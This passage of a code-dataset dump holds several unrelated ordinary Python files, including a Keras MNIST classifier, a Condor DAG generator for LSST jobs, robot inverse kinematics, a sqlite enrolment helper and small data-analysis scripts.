comentarios, arch_salida)\n fuente_unico.close()\n comentarios.close()\n arch_salida.close()\n \n elif opcion == \"2\":\n print(\"\n\")\n print(\"---FUNCTION LOOKUP--------\")\n comentarios = open(\"comentarios.csv\", \"r\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n salida = open(\"./salidas_modulos/ayuda_funciones.txt\",\"w\")\n lista_funciones = lista_de_funciones(fuente_unico)\n mostrar_cuadro(lista_funciones)\n main_consulta_funciones(fuente_unico, comentarios, salida, lista_funciones)\n comentarios.close()\n fuente_unico.close()\n salida.close()\n\n elif opcion == \"3\":\n print(\"\n\")\n print(\"-------CODE REUSE ANALYZER--------\n\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n salida = open(\"./salidas_modulos/analizador.txt\",\"w\")\n main_analizador(fuente_unico, salida)\n fuente_unico.close()\n salida.close()\n\n elif opcion == \"4\":\n print(\"\n\")\n print(\"-------INVOCATION TREE--------\n\")\n main = \"main_main\"\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n main_arbol_invocacion(fuente_unico, main)\n fuente_unico.close()\n\n elif opcion == \"5\":\n print(\"\n\")\n print(\"---PER-DEVELOPER INFORMATION--------\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n comentarios = open(\"comentarios.csv\", \"r\")\n arch_salida = open(\"./salidas_modulos/participacion.txt\", \"w\")\n main_informacion_desarrollador(fuente_unico, comentarios, arch_salida)\n fuente_unico.close()\n comentarios.close()\n arch_salida.close()\n\nmain_main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174504556","text":"# %load q04_plot_runs_by_balls/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#plt.switch_backend('agg')\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_runs_by_balls():\n x = ipl_df.groupby(['match_code','batsman']).count()['delivery']\n y = ipl_df.groupby(['match_code','batsman']).sum()['runs']\n plt.scatter(x,y)\n plt.title('Runs Scored for total balls Played')\n plt.xlabel('Balls Played')\n plt.ylabel('Runs Scored')\n plt.show()\nplot_runs_by_balls()\n\n\n","sub_path":"q04_plot_runs_by_balls/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"169452674","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nprint((-2000**(2/3)))\nprint((abs(-2000)**(2/3)))\nprint((abs(-2000**(2/3))))\nprint(((-2000)**(2/3)).real)\nexit()\n\nt_nought = 10\nA = 1\n\nL = np.linspace(0.001,40000, 1000000)\nsigma_t = 1\n\nfront = 1/np.sqrt(2*np.pi*sigma_t**2)\n\n\ndef P_L(L):\n return front * np.exp(-0.5 * (((L/(sigma_t*A))**(0.25) - t_nought)**2)/sigma_t**2) * 0.25*(L/(sigma_t*A))**(-0.75)\n\nplt.plot(L, P_L(L))\nplt.show()\n\ndef random_sample(func, xmin, xmax, ymin, ymax, num_samples):\n \"\"\"\n Generates random positions that follow the profile of equation 2\n\n :return:\n \"\"\"\n\n inputs = []\n outputs = []\n\n while len(outputs) < num_samples: # While the number of accepted values is less than the number of required samples\n x = np.random.uniform(size=1)[0] * (xmax - xmin) + xmin # Generate random number for X\n y = np.random.uniform(size=1)[0] * (ymax - ymin) + ymin # Generate random for Y as well\n if y <= func(x): # The check for if y <= p(x), if not, its rejected, else, accepted\n inputs.append(x)\n outputs.append(y)\n\n return inputs, outputs\n\n\nx, y = random_sample(P_L, L[0], L[-1], min(P_L(L)), max(P_L(L)), num_samples=1000000)\n\nplt.hist(x, bins=10000, density=True)\nplt.title(\"X\")\nplt.show()\n\nalpha = np.linspace(0, 20, 1000)\nPosterior_alpha = pow(2,-alpha)*(alpha - 1)\nplt.plot(alpha, Posterior_alpha)\nplt.xlim(0,10)\nplt.ylabel( r'P($\\alpha$|S)', size=20)\nplt.xlabel(r'$\\alpha$', size=20)\nplt.show()\n\nprint(alpha[np.argmax(Posterior_alpha)])\n\n","sub_path":"bayesian_inference.py","file_name":"bayesian_inference.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"42784107","text":"#!/usr/bin/python3\n\ntest_list = [(3, 1, 5,100), (1, 3, 6,200), (2, 5, 7,300), \n (5, 2, 8,400), (6, 3, 0,500)] \n \n# printing original list \nprint(\"The original list is : \" + str(test_list)) \n \n# initialize ele \nele = 3\n \n# initialize K \nK = 1 \n \n# Indices of Kth element value \n# Using loop \n# using y for K = 1 \nres = [] \ncount = 0\nfor x, y, z, zz in test_list: \n if y == ele: \n res.append(count) \n count = count + 1\n\n\nprint (res)\n\nprint (test_list[1][1])\nprint (test_list[4][1])\nprint (count)\n\ndd = [a for a, b in enumerate(test_list) if b[K] == ele]\n\nprint (dd)\n\n\nfor a, b in enumerate(test_list):\n\tif b[K] == ele:\n\t\tprint (a)\n","sub_path":"aa/PYT/Reg/kth_val.py","file_name":"kth_val.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"156134155","text":"import requests\nimport pandas as pd\nimport os\nimport yaml\n\nroot_dir = os.path.abspath(os.path.dirname(__file__))\n# retrieving base url\nyaml_path = os.path.join(root_dir, '../askdata/askdata_config/base_url.yaml')\nwith open(yaml_path, 'r') as file:\n # The FullLoader parameter handles the conversion from YAML\n # scalar values to Python the dictionary format\n url_list = yaml.load(file, Loader=yaml.FullLoader)\n\n\ndef ask_dataframe(dataframe: pd.DataFrame, query: str):\n human2sql_request = {\n \"dataframe\": dataframe.to_dict(),\n \"query\": query\n }\n\n human2sql_url = url_list['BASE_URL_HUMAN2SQL_DEV']\n\n human2sql_response = requests.post(human2sql_url, json=human2sql_request)\n response_df = []\n if human2sql_response.ok:\n res = human2sql_response.json()\n if 'result' in res:\n all_dfs = res['result']\n for df in all_dfs:\n 
response_df.append(pd.DataFrame(df))\n if 'messages' in res and res['messages']:\n for mex in res['messages']:\n print(mex)\n else:\n print(\"Error: \"+str(human2sql_response))\n\n return response_df\n","sub_path":"askdata/human2sql.py","file_name":"human2sql.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584677060","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/2/4 12:41\r\n# File: 1725.py\r\n# Desc: \r\nimport collections\r\nfrom typing import List\r\n\r\n\r\nclass Solution:\r\n def countGoodRectangles(self, rectangles: List[List[int]]) -> int:\r\n l = [min(i) for i in rectangles]\r\n c = collections.Counter(l)\r\n m = max(c.keys())\r\n return c[m]\r\n","sub_path":"Solutions/1725/1725.py","file_name":"1725.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167001088","text":"#!/usr/bin/env python\n\n#\n# LSST Data Management System\n# Copyright 2008, 2009, 2010 LSST Corporation.\n#\n# This product includes software developed by the\n# LSST Project (http://www.lsst.org/).\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the LSST License Statement and\n# the GNU General Public License along with this program. 
If not,\n# see .\n#\n\nimport argparse\nimport sys\nimport shlex\n\n\n# assigned to a parser instance attribute below, so it must be a plain\n# function of the line alone (no 'self' parameter)\ndef _line_to_args(line):\n for arg in shlex.split(line, comments=True, posix=True):\n if not arg.strip():\n continue\n yield arg\n\n\ndef makeArgumentParser(description, inRootsRequired=True, addRegistryOption=True):\n\n parser = argparse.ArgumentParser(\n description=description,\n fromfile_prefix_chars=\"@\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\" \n\"\n \"ly.\")\n parser.convert_arg_line_to_args = _line_to_args\n\n parser.add_argument(\n \"-s\", \"--source\", dest=\"source\",\n help=\"Source site for file transfer.\")\n\n parser.add_argument(\n \"-w\", \"--workerdir\", dest=\"workerdir\",\n help=\"workers directory\")\n\n parser.add_argument(\n \"-t\", \"--template\", dest=\"template\",\n help=\"template file\")\n\n parser.add_argument(\n \"-p\", \"--prescript\", dest=\"prescript\",\n help=\"pre shell script\")\n\n parser.add_argument(\n \"-r\", \"--runid\", dest=\"runid\",\n help=\"runid of this job\")\n\n parser.add_argument(\n \"-i\", \"--idsPerJob\", dest=\"idsPerJob\",\n help=\"number of ids to run per job\")\n\n return parser\n\n\ndef writeDagFile(pipeline, templateFile, infile, workerdir, prescriptFile, runid, idsPerJob):\n \"\"\"\n Write Condor Dag Submission files.\n \"\"\"\n\n print(\"Writing DAG file \")\n\n outname = pipeline + \".diamond.dag\"\n\n print(outname)\n\n outObj = open(outname, \"w\")\n\n outObj.write(\"JOB A \"+workerdir+\"/\" + pipeline + \".pre\n\")\n outObj.write(\"JOB B \"+workerdir+\"/\" + pipeline + \".post\n\")\n outObj.write(\" \n\")\n\n print(\"prescriptFile = \", prescriptFile)\n if prescriptFile is not None:\n outObj.write(\"SCRIPT PRE A \"+prescriptFile+\"\n\")\n\n print(\"First Input File loop \")\n\n # Loop over input entries\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n outObj.write(\"JOB A\" + str(count) + \" \"+workerdir+\"/\" + templateFile + \"\n\")\n\n outObj.write(\" \n\")\n\n print(\"Second Input File loop \")\n\n # Loop over input entries\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n myData = aline.rstrip()\n\n # Searching for a space detects\n # extended input like : visit=887136081 raft=2,2 sensor=0,1\n # No space is something simple like a skytile id\n if \" \" in myData:\n # Change space to :\n myList = myData.split(' ')\n new1Data = '%s:%s:%s' % tuple(myList)\n # Change = to -\n myList2 = new1Data.split('=')\n new2Data = '%s-%s-%s-%s' % tuple(myList2)\n # Change , to _\n myList3 = new2Data.split(',')\n new3Data = '%s_%s_%s' % tuple(myList3)\n\n newData = new3Data\n visit = myList[0].split('=')[1]\n else:\n newData = myData\n visit = myData\n\n # VARS A1 var1=\"visit=887136081 raft=2,2 sensor=0,1\"\n # VARS A1 var2=\"visit-887136081:raft-2_2:sensor-0_1\"\n outObj.write(\"VARS A\" + str(count) + \" var1=\\\"\" + myData + \"\\\" \n\")\n outObj.write(\"VARS A\" + str(count) + \" var2=\\\"\" + newData + \"\\\" \n\")\n outObj.write(\"VARS A\" + str(count) + \" visit=\\\"\" + visit + \"\\\" \n\")\n outObj.write(\"VARS A\" + str(count) + \" runid=\\\"\" + runid + \"\\\" \n\")\n outObj.write(\"VARS A\" + str(count) + \" workerid=\\\"\" + str(count) + \"\\\" \n\")\n\n print(\"Third Input File loop \")\n\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n # PARENT A CHILD A1\n # PARENT A1 CHILD B\n outObj.write(\"PARENT A CHILD A\" + str(count) + \" \n\")\n outObj.write(\"PARENT A\" + str(count) + \" CHILD B \n\")\n\n 
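# The assembled DAG is a diamond: the pre-script job A fans out to A1..An, and every Ai feeds into the post job B.\n 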
outObj.close()\n\n\ndef main():\n print('Starting generateDag.py')\n parser = makeArgumentParser(description=\"generateDag.py writes a Condor DAG for job submission \"\n \"by reading an input list and writing each attribute as an argument.\")\n print('Created parser')\n ns = parser.parse_args()\n print('Parsed Arguments')\n print(ns)\n\n # SA\n # templateFile = \"SourceAssoc-template.condor\"\n # pipeline = \"SourceAssoc\"\n # infile = \"sky-tiles\"\n\n # Pipeqa\n # templateFile = \"pipeqa-template.template\"\n # pipeline = \"pipeqa\"\n # infile = \"visits-449\"\n\n # processCcdLsstSim\n pipeline = \"S2012Pipe\"\n\n writeDagFile(pipeline, ns.template, ns.source, ns.workerdir, ns.prescript, ns.runid, ns.idsPerJob)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"etc/condor/scripts/generateDag.py","file_name":"generateDag.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379133222","text":"\nclass StdoutLog(object):\n def __init__(self, log_path, stdout, print_to_log=True, print_to_stdout=True):\n if print_to_log:\n self.log = open(log_path, 'w')\n self.str = \"\"\n self.stdout = stdout\n self.print_to_log = print_to_log\n self.print_to_stdout = print_to_stdout\n\n def write(self, incoming_str):\n if incoming_str.endswith('\n'):\n output = self.str + incoming_str\n\n if self.print_to_log:\n self.log.write(output)\n self.log.flush()\n\n if self.print_to_stdout:\n self.stdout.write(output)\n self.stdout.flush()\n\n self.str = \"\"\n else:\n self.str = self.str + incoming_str\n\n def flush(self):\n self.stdout.flush()\n","sub_path":"TrackingByReinforcementLearning/Utilities/stdout_log.py","file_name":"stdout_log.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18250041","text":"from multiprocessing import Process, Queue\nfrom time import sleep\n\ndef producer(n, q):\n for i in range(n):\n q.put(i)\n sleep(1)\n q.put(\"end\")\ndef consumer(q):\n v = q.get()\n v.p()\n while v != \"end\":\n v = q.get()\n # q.task_done()\n v.p()\n\nif __name__ == '__main__':\n import print_helper\n q = Queue()\n p = Process(target=producer, args=(3,q))\n p.start()\n consumer(q)\n # sleep(3)\n # if p.is_alive():\n # p.terminate()\n # p.join()","sub_path":"python/cookbook/concurrency/process_queue.py","file_name":"process_queue.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"329502131","text":"\"\"\"\nUsing Tensorflow-Keras to train a fully connected neural network (MLP) of size 784-50-10 using\nstochastic gradient descent (SGD)\n\nTo set the Theano flags and GPU settings, run the following in a terminal window (Bash):\n set THEANO_FLAGS=\"mode=FAST_RUN\" & set THEANO_FLAGS=\"device=gpu\"\n & set THEANO_FLAGS=\"floatX=float32\" & python mnist_keras_mlp.py\n\nThe program has to be run inside a conda virtual environment:\n conda activate ml_conda # starts up the required virtual environment\n\"\"\"\n\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\nimport theano\nimport numpy as np\nimport struct\nimport os\n\ntheano.config.floatX='float32'\nnp.random.seed(1)\n\n\n# Loading the MNIST dataset of handwritten digits 0 to 9\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from path\"\"\"\n labels_path = 
os.path.join(path, '{0}-labels.idx1-ubyte'.format(kind))\n images_path = os.path.join(path, '{0}-images.idx3-ubyte'.format(kind))\n\n with open(labels_path, 'rb') as lbl_path:\n magic, n = struct.unpack('>II', lbl_path.read(8))\n labels = np.fromfile(lbl_path, dtype=np.uint8)\n\n with open(images_path, 'rb') as img_path:\n magic, num, rows, cols = struct.unpack(\">IIII\", img_path.read(16))\n images = np.fromfile(img_path, dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\nx_train, y_train = load_mnist('mnist', kind='train')\nprint('Rows:', x_train.shape[0], ' Columns:', x_train.shape[1])\nx_test, y_test = load_mnist('mnist', kind='t10k')\nprint('Rows:', x_test.shape[0], ' Columns:', x_test.shape[1])\n\nx_train = x_train.astype(theano.config.floatX)\nx_test = x_test.astype(theano.config.floatX)\n\nprint(\"First 3 labels: \", y_train[:3])\ny_train_ohe = np_utils.to_categorical(y_train)\nprint('\nFirst 3 labels (one-hot): \n',y_train_ohe[:3],'\n')\n\n\nmodel = Sequential()\n# input layer\nmodel.add(Dense(input_dim=x_train.shape[1], units=50, kernel_initializer='uniform', activation='tanh'))\n# hidden layer\nmodel.add(Dense(input_dim=50, units=50, kernel_initializer='uniform', activation='tanh'))\n# output layer\nmodel.add(Dense(input_dim=50, units=y_train_ohe.shape[1], kernel_initializer='uniform', activation='softmax'))\n\n\"\"\"Upon increasing the number of hidden layers to 3 (with the same number of units - 50), i.e. 784-50-50-50-10, \na steep drop in initial accuracy and an increase in runtime from 7 to 10 minutes are seen; \nthis is due to the vanishing and exploding gradient problems. \nFinal training and testing accuracies are about 5% lower than with 1 hidden layer, at 88% and 86% respectively. \nThe increase in runtime is simply due to the increase in the number of layers.\"\"\"\n\n\"\"\" Using 100 units in the hidden layer instead of 50, i.e. 784-100-10,\nnearly doubles the runtime; validation loss is reduced and validation accuracy increases.\nThe increase in runtime is due to the increased number of units in the hidden layer.\nFinal training accuracy is 96.61% and testing accuracy 95.65%\"\"\"\n\nsgd = SGD(lr=0.001, decay=1e-7, momentum=0.9)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nmodel.fit(x_train, y_train_ohe, epochs=50, batch_size=300, verbose=1,\n validation_split=0.1)\n\ny_train_pred = model.predict_classes(x_train, verbose=0)\n# print(\"First 3 predictions: \",y_train_pred[:3])\n\ntrain_acc = np.sum(y_train==y_train_pred, axis=0) / x_train.shape[0]\nprint(\"Training accuracy: {0:.2f}%\".format(train_acc * 100))\ny_test_pred = model.predict_classes(x_test, verbose=0)\ntest_acc = np.sum(y_test==y_test_pred, axis=0) / x_test.shape[0]\nprint(\"Test accuracy: {0:.2f}%\".format(test_acc * 100))\n\n","sub_path":"mnist_keras_mlp.py","file_name":"mnist_keras_mlp.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"611319024","text":"import pypot.dynamixel\nimport numpy as np\nimport itertools\nimport time\nimport math\n\ndef main():\n\n # Initialization of the Dynamixel Motors\n ports = pypot.dynamixel.get_available_ports()\n if not ports:\n raise IOError('no port found!')\n\n port = ports[0]\n print(\"connecting on the first available port: ports[0]\")\n dxl_io = pypot.dynamixel.DxlIO(ports[0])\n print(\"dxl_io:\", dxl_io)\n ids = dxl_io.scan([1, 2, 3, 5, 6])\n print(\"Found ids:\", ids)\n print(\"Present motor position:\", dxl_io.get_present_position(ids))\n #setting speed and position to be initial values\n #speed = dict(zip(ids, itertools.repeat(50)))\n #dxl_io.set_moving_speed(speed)\n #dxl_io.set_goal_position({2: (pos[0][0]), 6: (pos[1][0]), 5: (pos[2][0]), 3: (pos[3][0]), 1: (pos[4][0])})\n print(\"Setting up\")\n #time.sleep(2)\n zero_corr = [0.04, -20.53, 5.93, -2.86, 4.79, -5.58]\n\n #Define 6RUS design parameter\n base_length = 30 #Length of bottom platform\n top_length = 15 #Length of top platform\n l1 = 12 #Length of link1\n l2 = 24 #Length of link2\n half_angle = math.pi/6 #Please refer Ikin_convention pic\n rem_angle = math.pi/2 #Please refer Ikin_convention pic\n\n #Define Base Platform\n #Vertex 1 of base platform\n b1 = np.array([[0],[-base_length/(2*math.tan(rem_angle/2))],[-base_length/2]])\n #Vertex 2 of base platform\n rotangle = rem_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n b2 = Rx_clock.dot(b1)\n #Defining the rest vertices of base platform\n rotangle = rem_angle+half_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n b3 = Rx_clock.dot(b1)\n b4 = Rx_clock.dot(b2)\n b5 = Rx_clock.dot(b3)\n b6 = Rx_clock.dot(b4)\n \n #b1 to b6 are column vectors\n Base_matrix = np.concatenate((b1,b2,b3,b4,b5,b6), axis=1)\n #print Base_matrix\n #t0 is the epoch of the time\n #tr is the next instant. So, the program runs until tr-t0 becomes greater than the time specified\n t0 = time.time()\n tr = 0\n increment = 0.01\n print(\"t0:\", t0)\n while tr - t0 <= 30:\n tr = time.time()\n #Define Trajectory\n dt = tr-t0\n print(\"Time: \", dt)\n ex = 18\n ey = 5\n ez = 0*math.cos(dt)\n roll = 0\n pitch = 0\n yaw = 0\n translate = np.array([[ex],[ey],[ez]])\n R_roll = np.array([[math.cos(roll), -math.sin(roll), 0],[math.sin(roll), 
math.cos(roll), 0],[0, 0, 1]])\n R_yaw = np.array([[1, 0, 0],[0, math.cos(yaw),-math.sin(yaw)],[0, math.sin(yaw), math.cos(yaw)]])\n R_pitch = np.array([[math.cos(pitch), 0, math.sin(pitch)],[0, 1, 0],[-math.sin(pitch), 0, math.cos(pitch)]])\n\n #Defining the top platform \n t1 = np.array([[0],[-top_length/(2*math.tan(rem_angle/2))],[float(-top_length)/2]])\n #Vertex 2 of top platform\n rotangle = rem_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n t2 = Rx_clock.dot(t1)\n #Defining the rest vertices of top platform\n rotangle = rem_angle+half_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n t3 = Rx_clock.dot(t1)\n t4 = Rx_clock.dot(t2)\n t5 = Rx_clock.dot(t3)\n t6 = Rx_clock.dot(t4)\n t1f = R_roll.dot(R_pitch).dot(R_yaw).dot(t1) + translate \n t2f = R_roll.dot(R_pitch).dot(R_yaw).dot(t2) + translate\n t3f = R_roll.dot(R_pitch).dot(R_yaw).dot(t3) + translate\n t4f = R_roll.dot(R_pitch).dot(R_yaw).dot(t4) + translate\n t5f = R_roll.dot(R_pitch).dot(R_yaw).dot(t5) + translate\n t6f = R_roll.dot(R_pitch).dot(R_yaw).dot(t6) + translate\n\n Top_matrix = np.concatenate((t1f,t2f,t3f,t4f,t5f,t6f), axis=1)\n rangle = rem_angle/2\n rangle2 = rem_angle/2 + half_angle\n rangle3 = 1.5*rem_angle + half_angle\n rangle_vectclock = np.array([rangle, -rangle, -rangle2, -rangle3, rangle3, rangle2])\n #print(\"Rangle_val: \",rangle_vectclock)\n th = []\n for i in range(0,6):\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rangle_vectclock[i]), math.sin(rangle_vectclock[i])],[0, -math.sin(rangle_vectclock[i]), math.cos(rangle_vectclock[i])]])\n T = Rx_clock.dot(Top_matrix[:,i]-Base_matrix[:,i])\n th3 = -math.asin(T[2]/l2)\n pl2 = l2*math.cos(th3)\n th2 = math.acos((T[0]*T[0] + T[1]*T[1] - l1*l1 - pl2*pl2)/(2*l1*pl2))\n r = math.sqrt(l1*l1 + pl2*pl2 + 2*l1*pl2*math.cos(th2))\n phi = math.atan((l1 + pl2*math.cos(th2))/(pl2*math.sin(th2)))\n th.append(90-(((math.asin(T[0]/r))-phi)*180/math.pi))\n #print(th)\n speed = dict(zip(ids, itertools.repeat(150)))\n dxl_io.set_moving_speed(speed)\n dxl_io.set_goal_position({1: (-th[0]+zero_corr[0]), 2: (th[1]+zero_corr[1]), 3: (-th[2]+zero_corr[2]), 4: (th[3]+zero_corr[3]), 5: (-th[4]+zero_corr[4]), 6: (th[5]+zero_corr[5])})\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Hexa_Parallel/Python/Ikin_6RUS.py","file_name":"Ikin_6RUS.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82020156","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import MembersBoundView, MembersImageView, SuccessView, MembersUnionid\n\nurlpatterns = [\n # member binding page\n url(r'^membersbound', MembersBoundView.as_view(), name=\"members_bound\"),\n url(r'^success', SuccessView.as_view(), name=\"success\"),\n # member QR code\n url(r'^membersimage', MembersImageView.as_view(), name=\"members_image\"),\n # batch-fetch the unionid of members already bound to WeChat\n url(r'^membersunionid', MembersUnionid.as_view(), name=\"members_unionid\")\n]\n","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"88959294","text":"#!/usr/bin/env python3\n#By Dr.ZCH\n\nimport sqlite3\n\nconn=sqlite3.connect('test.db')\nconn.execute('pragma foreign_keys=ON')\n\ndef header(table):\n header=[]\n if table:\n # PRAGMA cannot take bound parameters, so the table name is interpolated directly\n cursor=conn.execute('pragma table_info('+table+')')\n for row in cursor:\n header.append(row[1])\n return header\ndef content(table):\n content=[]\n if table:\n cursor=conn.execute('select * from '+table+';')\n for row in cursor:\n content.append(row)\n return content\n\ndef s(sid):\n # parameterized queries keep user input out of the SQL string\n cursor=conn.execute('select * from s where sid=?;', (sid,))\n s=[]\n for row in cursor:\n s.append(row)\n return s\n\ndef c(sid):\n cursor=conn.execute('select * from c where cid in (select sc.cid from sc where sc.cid=c.cid and sid=?);', (sid,))\n c=[]\n for row in cursor:\n c.append(row)\n return c\ndef sc(sid):\n cursor=conn.execute('select * from sc where sid=?;', (sid,))\n c=[]\n for row in cursor:\n c.append(row)\n return c\ndef x(sid,cid):\n conn.execute('insert into sc(sid,cid) VALUES(?,?);', (sid, cid))\n conn.commit() # persist the insert\n return c(sid)\ndef t(sid,cid):\n conn.execute('delete from sc where sid=? and cid=?;', (sid, cid))\n conn.commit() # persist the delete\n return c(sid)\n","sub_path":"gui_sql/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435945819","text":"#!/bin/python\nimport subprocess\nfrom sys import argv\n\ndef main():\n\tif len(argv) != 5:\n\t\tprint(\"Please use as $ \" + argv[0] + \" [Duration] [Packet Rate] [Bit Rate] [Interface]\")\n\t\texit()\n\n\tduration = float(argv[1]) # -3 because we neglect first and last two recordings\n\tpacket_rate = int(argv[2])\n\tbit_rate = int(argv[3])\n\tinterface = argv[4]\n\n\tlines = subprocess.check_output([\"./get_net_usage/get_net_usage\", interface, \\\n\t\t\t\t\t\t\t\t\t \"-t\", \"1\", \"-X\", \"2\"])\n\tlines = lines.strip().split(\"\n\")\n\t\n\t\"\"\"\n\tExplaining lines[2:-4]\n\t- lines[0] is a notification\n\t- lines[-1] is a notification\n\t- lines[1] is sometimes inaccurate being the first entry\n\t- lines[-2] is sometimes inaccurate being the last entry\n\t- lines[-3] & lines[-4] are used to track zero traffic to stop the program\n\t\"\"\"\n\tlines = lines[2:-4]\n\n\tpack_rate_av = 0.0\n\tbit_rate_av = 0.0\n\tfor line in lines:\n\t\tline = line.split(\" \")\n\t\tpack_rate_av += float(line[4])\n\t\tbit_rate_av += float(line[2])\n\n\t# Post recording calculations\n\tduration = len(lines) # compensates for trimming to lines[2:-4]\n\tpack_rate_av /= duration\n\tbit_rate_av /= duration\n\t\n\tprint(\"Expected Packet Rate: {} | Actual Packet Rate: {}\"\\\n\t\t .format(packet_rate, str(pack_rate_av)))\n\tprint(\"Difference: {} | Accuracy: {}%\".format\\\n\t\t(round(packet_rate - pack_rate_av, 2), round((pack_rate_av / packet_rate) * 100, 2)))\n\tprint(\"Expected Bit Rate: {} | Actual Bit Rate: {}\"\\\n\t\t .format(bit_rate, bit_rate_av))\n\tprint(\"Difference: {} | Accuracy: {}%\".format\\\n\t\t(round(bit_rate - bit_rate_av, 2), round((bit_rate_av / bit_rate) * 100, 2)))\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"Tests/evalMaceNorm.py","file_name":"evalMaceNorm.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}